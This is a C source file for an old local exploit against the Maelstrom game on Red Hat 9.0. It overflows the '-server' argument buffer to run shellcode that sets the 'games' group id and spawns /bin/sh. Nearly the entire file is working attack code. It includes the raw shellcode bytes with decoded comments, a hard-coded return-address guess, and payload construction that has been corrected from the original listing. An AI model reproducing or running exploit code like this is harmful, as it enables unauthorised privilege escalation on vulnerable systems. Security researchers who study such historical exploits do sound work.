Maelstrom local exploit that yields a shell running with the gid of the `games` group (the payload calls setregid(20, 20) before execve("//bin/sh")), abusing the buffer overflow in the handling of the `-server` switch's argument. Tested against /usr/bin/Maelstrom on Red Hat 9.0; the shellcode address is hard-coded for that setup.
d35fbfa93b97946227f3f1032375023f8f6aba52ebed8a946e94bfbe4648d811
/* 0x333maelstrom => Maelstrom local game exploit
*
* proof-of-concept exploit tested against
* /usr/bin/Maelstrom under RH 9.0 (the return address used in
* main() is a fixed guess for that build and stack layout)
*
* coded by c0wboy
*
* (c) 0x333 Outsiders Security Labs / www.0x333.org
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#define MAEL "/usr/bin/Maelstrom"
#define SIZE 8177
#define ALIGN 3

/*
 * Linux/x86 payload, 38 bytes, handed to the target as its only
 * environment string (see main()). Decoded it is:
 *
 *   setregid(20, 20)      -- gid 20, the "games" group per the
 *                            description above
 *   execve("//bin/sh", { "//bin/sh", NULL }, NULL)
 *
 * It contains no NUL byte, so it survives being passed as a C string.
 * The byte values are the exploit's contract; only the grouping and
 * comments differ from the original listing.
 */
unsigned char shellcode[] =
	/* xor eax,eax ; xor ebx,ebx ; xor ecx,ecx */
	"\x31\xc0" "\x31\xdb" "\x31\xc9"
	/* mov bl,20 ; mov cl,20 ; mov al,71 (setregid) ; int 0x80 */
	"\xb3\x14" "\xb1\x14" "\xb0\x47" "\xcd\x80"
	/* xor eax,eax ; push eax  -> terminating NUL for the path */
	"\x31\xc0" "\x50"
	/* push "n/sh" ; push "//bi" ; mov ebx,esp  -> ebx = "//bin/sh" */
	"\x68\x6e\x2f\x73\x68" "\x68\x2f\x2f\x62\x69" "\x89\xe3"
	/* cdq (edx = 0, envp) ; push edx ; push ebx ; mov ecx,esp -> argv */
	"\x99" "\x52" "\x53" "\x89\xe1"
	/* mov al,11 (execve) ; int 0x80 */
	"\xb0\x0b" "\xcd\x80";
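/*
 * Build the overflow payload and replace this process with the target.
 *
 *   argv : MAEL -server <payload>
 *   envp : the shellcode alone, so it sits at a predictable spot near the
 *          top of the target's stack. `ret` is the guess for its address:
 *          0xbffffffa minus the execfn path and the shellcode itself.
 *          This presumably relies on the fixed 0xbfffffff stack top of the
 *          32-bit kernels of that era (no stack randomisation) and will
 *          not hold on modern systems.
 *
 * Payload layout (SIZE-1 bytes, NUL-terminated):
 *   [ALIGN filler bytes "3@3"][ret][ret]...[truncated ret]
 *
 * Fixes versus the original listing: the fill loop wrote 2044 full copies
 * of ret starting at offset ALIGN, i.e. two bytes past the end of out[],
 * and never NUL-terminated the buffer (so the argument's length depended
 * on whatever followed out[] on the stack); `ret` was also stored as a
 * signed int from a value above INT_MAX and written through a misaligned
 * int pointer. The payload now has exactly SIZE-1 bytes -- re-verify the
 * offset if re-testing against the real binary.
 *
 * Returns 1 (after perror) only if execle() fails; on success the target
 * image takes over and main() never returns.
 */
int main(void)
{
	char out[SIZE];
	char *cya[2] = { (char *)shellcode, NULL };
	/* Low 32 bits of the guessed address. The original stored it with
	 * native int writes, so copying the native unsigned int keeps the
	 * same byte order (little-endian on an x86 host, as the i386 target
	 * expects). */
	unsigned int ret = (unsigned int)(0xbffffffaUL
	                                  - strlen((const char *)shellcode)
	                                  - strlen(MAEL));
	size_t off;

	/* Filler so the address copies land at the alignment the original
	 * exploit was tuned for ("3@3" is arbitrary non-NUL data). */
	memcpy(out, "3@3", ALIGN);

	/* Repeat ret up to, but not including, the last byte, which holds the
	 * terminator; the final copy is truncated to fit instead of overrunning
	 * the buffer. */
	for (off = ALIGN; off < SIZE - 1; off += sizeof ret) {
		size_t n = SIZE - 1 - off;
		if (n > sizeof ret)
			n = sizeof ret;
		memcpy(out + off, &ret, n);
	}
	out[SIZE - 1] = '\0';

	fprintf (stdout, "\n ** /usr/bin/Maelstrom local game exploit vr.0.2\n");
	fprintf (stdout, " ** by c0wboy / www.0x333.org\n\n");

	/* execle() only returns on failure. The argv sentinel of a variadic
	 * call must be a pointer, not a bare integer NULL. */
	execle (MAEL, MAEL, "-server", out, (char *)NULL, cya);
	perror ("execle");
	return 1;
}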